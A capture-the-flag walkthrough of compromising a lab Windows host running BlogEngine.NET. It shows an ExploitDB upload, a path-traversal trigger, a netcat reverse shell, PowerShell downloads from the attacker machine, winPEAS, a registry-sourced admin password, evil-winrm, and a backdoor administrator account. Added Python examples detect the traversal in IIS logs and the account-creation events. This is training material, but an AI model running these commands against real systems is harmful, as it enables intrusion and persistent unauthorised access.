As always, we start with an nmap scan.
nmap -A 172.31.1.16
As you can see, we have a web server on port 80, SMB on port 445, and RDP on port 3389. Note for later that the machine’s name is ENGINE. Let’s continue on.
We start by checking out the web server on port 80, but all we get is a default page.
Default Windows IIS Webpage
This is a common occurrence in a penetration test: the default page often hides applications running in subdirectories. We can check for this using Dirsearch.
python3 dirsearch.py -u 172.31.1.16 -e php,cgi,txt,exe,html -x 400,401,403 -r -R 3
Dirsearch has successfully located additional directories, and in this case specifically the /blog directory. Let’s check that out in the browser now and see what we find.
We can see a page named “Alex’s Blog,” which appears to be running BlogEngine.net. Additionally, we can attempt to log in by clicking the login button in the submenu above.
BlogEngine Login page for Alex’s Blog
I attempted to use default credentials I found online, but they were unsuccessful. However, the tried-and-true “admin:admin” worked, and we gained access to the administrator dashboard. Let’s go back to the BlogEngine service we discovered earlier and do some research. Searchsploit shows the following results.
BlogEngine appears to be vulnerable to directory traversal and remote code execution. Let’s do some research and see whether one of these exploits can help us gain access. After some searching, we find that one of them (46353.cs) fits our needs.
ExploitDB BlogEngine.NET 3.3.6 Exploit
Now that we have a possible exploit, we need to figure out how to use it. Fortunately this one is straightforward. We can copy it from the ExploitDB folder on Kali to our working directory and inspect its requirements.
Copying 46353.cs from ExploitDB directory to our working directory
There are a couple of things to note here. First, at the bottom of the file we have to modify the IP address and port. At the top we are instructed to save the file as “PostView.ascx”, since that is the filename the BlogEngine service will recognize. Modify as required, save the file, and once you’ve done this we can move ahead.
Now navigate through the dashboard to the edit menu for the single post we can find on the server.
Choose the post above
Click the File Manager button as shown above
From here you should see an upload button. Select that, and upload your “PostView.ascx” file.
Now that the file is uploaded, we need to navigate to the directory shown in the exploit file. But first, start a Netcat listener on the port we specified in the exploit. If you’ve followed the instructions correctly, you should get a reverse shell when you visit the URL.
Reverse Shell – http://172.31.1.16/blog/?theme=../../App_Data/files
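The URL above is the one artifact of this attack that lands in the web server’s own logs: a theme parameter that climbs out of the themes directory with “../”. As an added example (not code from the original walkthrough or from BlogEngine), here is a defender-side check in Python that scans IIS W3C log lines for that pattern, decoding the query string repeatedly so URL-encoded and double-encoded variants are caught, plus the server-side mitigation: resolving a user-supplied theme name and refusing anything that resolves outside the themes root. The log lines, hostnames and paths are constructed for the example.

```python
"""Detect path-traversal attempts in IIS logs and show the safe way to resolve
a theme name. Added example; the sample log lines below are constructed."""
import os
import re
from urllib.parse import parse_qs, unquote

# Constructed sample in the default IIS W3C layout (one space-separated line per request).
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2020-01-01 10:00:01 172.31.1.16 GET /blog/ - 80 - 10.10.0.7 Mozilla/5.0 200
2020-01-01 10:00:05 172.31.1.16 GET /blog/ theme=Standard 80 - 10.10.0.7 Mozilla/5.0 200
2020-01-01 10:00:09 172.31.1.16 GET /blog/ theme=../../App_Data/files 80 - 10.10.0.7 Mozilla/5.0 200
2020-01-01 10:00:12 172.31.1.16 GET /blog/ theme=..%2F..%2FApp_Data%2Ffiles 80 - 10.10.0.7 Mozilla/5.0 200
2020-01-01 10:00:15 172.31.1.16 GET /blog/api/posts/ - 80 - 10.10.0.7 Mozilla/5.0 200
"""

# A ".." path segment, delimited by either slash style or the string boundary.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def decode_fully(value, rounds=3):
    """URL-decode repeatedly so double-encoded sequences (%252e%252e) are seen as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # malformed or multi-space line; skip rather than misalign columns
        yield dict(zip(fields, parts))


def is_traversal(query):
    """True if any query parameter value contains a '..' segment after decoding."""
    if query in ("", "-"):
        return False
    params = parse_qs(decode_fully(query), keep_blank_values=True)
    return any(TRAVERSAL.search(v) for values in params.values() for v in values)


def find_traversal_requests(text):
    """Return (time, client ip, uri stem, decoded query) for each suspicious request."""
    hits = []
    for rec in parse_w3c(text):
        if is_traversal(rec["cs-uri-query"]):
            hits.append((rec["time"], rec["c-ip"], rec["cs-uri-stem"],
                         decode_fully(rec["cs-uri-query"])))
    return hits


def safe_theme_dir(themes_root, theme):
    """Mitigation side: resolve a theme name under the themes directory and return
    None if the normalized path escapes it. Compare normalized absolute paths
    (commonpath), never substrings, so '..' and mixed separators are handled."""
    root = os.path.abspath(themes_root)
    candidate = os.path.abspath(os.path.join(root, theme))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    for hit in find_traversal_requests(SAMPLE_LOG):
        print("traversal attempt:", hit)
    print("safe:", safe_theme_dir("/srv/blog/themes", "Standard"))
    print("rejected:", safe_theme_dir("/srv/blog/themes", "../../App_Data/files"))
```

Run against a real IIS log the same check works unchanged as long as the #Fields header is present; the decode loop is the important detail, since a filter that only looks for a literal “../” misses the %2F and %252F forms that the third and fourth sample lines show.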
You’ll notice that the shell is funky and would benefit from an upgrade. I do this by using PowerShell on the target to download my Netcat binary from our Kali machine. Remember to start your Python SimpleHTTPServer as well.
Bottom – python -m SimpleHTTPServer 8181; Top – powershell -c wget "http://10.10.0.7:8181/nc.exe" -outfile "nc.exe"
You can now start another Netcat listener on Kali, and run nc.exe from the target machine to connect back. Let’s do that now.
Bottom – nc -nlvp 5555; Top – nc.exe 10.10.0.7 5555 -e cmd.exe
Great! We now have a more stable shell. Unfortunately, we quickly find that we do not have access to the user or Admin folders. We will need to escalate privileges.
User folder access denied
We can use various methods to look for ways to escalate. In this case I used winPEAS. Let’s grab it from the Tools folder on our Kali machine and run it.
powershell -c wget "http://10.10.0.7:8181/winPEAS.exe" -outfile "winPEAS.exe"; winpeas.exe
We let winPEAS do its thing, and once it’s complete we can go through the results. One thing sticks out: some default credentials have been found hiding in the registry.
Default Credentials Found
Now that we have what appear to be Administrator credentials, we can attempt to log in with them. Noting that we found SMB running on the machine earlier, we can use psexec or, in the case of this walkthrough, Evil-WinRM.
evil-winrm -i 172.31.1.16 -u administrator -p PzCEKhvj6gQMk7kA -s /root/Desktop/Tools
You’ll notice that whoami returns administrator, which is what we hoped for. Additionally, please make note of my use of the -s flag followed by a directory. This allows you to run scripts and programs directly from the Tools directory on your Kali machine. Neat trick! Let’s grab our flags quick.
access.txt and system.txt flags found
If you’re here for just the flags, then congratulations! You have completed the challenge and can submit the hashes to the CSL dashboard for the machine. If you are interested in some basic post-exploitation, then please continue on.
Now that we have administrative access, we can think about how to provide continued access in the future. As with previous guides, we can simply create a user and add them to the Administrators group.
net user themayor !Password!123 /add; net localgroup Administrators themayor /add
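The two commands above leave a very recognizable trail in the Windows Security log: event 4720 (a user account was created) followed within a second or two by event 4732 (a member was added to a security-enabled local group). As an added example, not code from the original walkthrough, here is a small Python correlation that reads exported Security events (as dicts, the way a SIEM or a Get-WinEvent export would hand them over) and raises an alert when an account is added to the local Administrators group shortly after it was created. The event IDs are the real Windows ones; the records, account names and timestamps are constructed, and it is assumed that the export has already resolved the 4732 member SID to an account name.

```python
"""Correlate account creation (4720) with Administrators membership (4732).
Added example; SAMPLE_EVENTS is constructed and the member field is assumed
to be the resolved account name rather than the raw SID."""
from datetime import datetime, timedelta

# Constructed Security-log records. The first two mirror the net user / net localgroup pair.
SAMPLE_EVENTS = [
    {"time": "2020-01-01T12:00:00", "id": 4720, "subject": "ENGINE\\Administrator", "target": "themayor"},
    {"time": "2020-01-01T12:00:01", "id": 4732, "subject": "ENGINE\\Administrator",
     "member": "themayor", "group": "Administrators"},
    {"time": "2020-01-01T09:15:00", "id": 4720, "subject": "ENGINE\\helpdesk", "target": "jsmith"},
    {"time": "2020-01-01T15:30:00", "id": 4732, "subject": "ENGINE\\helpdesk",
     "member": "jsmith", "group": "Remote Desktop Users"},
    {"time": "2020-01-02T08:00:00", "id": 4732, "subject": "ENGINE\\helpdesk",
     "member": "svc_backup", "group": "Administrators"},
]


def parse_time(stamp):
    return datetime.fromisoformat(stamp)


def find_new_admins(events, window=timedelta(minutes=30), group="Administrators"):
    """Return one alert per 4732 event that adds an account to `group` when that
    account has a 4720 creation event within `window` before the addition."""
    created = {}  # lower-cased account name -> list of creation times
    for e in events:
        if e["id"] == 4720:
            created.setdefault(e["target"].lower(), []).append(parse_time(e["time"]))

    alerts = []
    for e in events:
        if e["id"] != 4732 or e["group"].lower() != group.lower():
            continue
        added_at = parse_time(e["time"])
        recent = [c for c in created.get(e["member"].lower(), [])
                  if timedelta(0) <= added_at - c <= window]
        if recent:
            alerts.append({
                "account": e["member"],
                "created": min(recent).isoformat(),
                "added": e["time"],
                "by": e["subject"],
                "group": e["group"],
            })
    return alerts


def find_group_additions(events, group="Administrators"):
    """Lower-severity view: every addition to `group`, whether the account is new or not."""
    return [e for e in events if e["id"] == 4732 and e["group"].lower() == group.lower()]


if __name__ == "__main__":
    for alert in find_new_admins(SAMPLE_EVENTS):
        print("new local admin:", alert)
    print("all Administrators additions:", len(find_group_additions(SAMPLE_EVENTS)))
```

The correlation fires only for themayor: jsmith was created hours before being added to a different group, and svc_backup was added to Administrators without a matching creation event, which is still worth a look but is reported by the lower-severity `find_group_additions` view rather than as a new-admin alert.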
We saw earlier that RDP is already enabled, so we don’t need to enable it and can simply attempt to log in using XFreeRDP.
xfreerdp /u:themayor /p:'!Password!123' /v:172.31.1.16
And we are successfully in the Server 2012 environment. Open up Server Manager quick to verify that we are in the Administrators group, and you’re all set.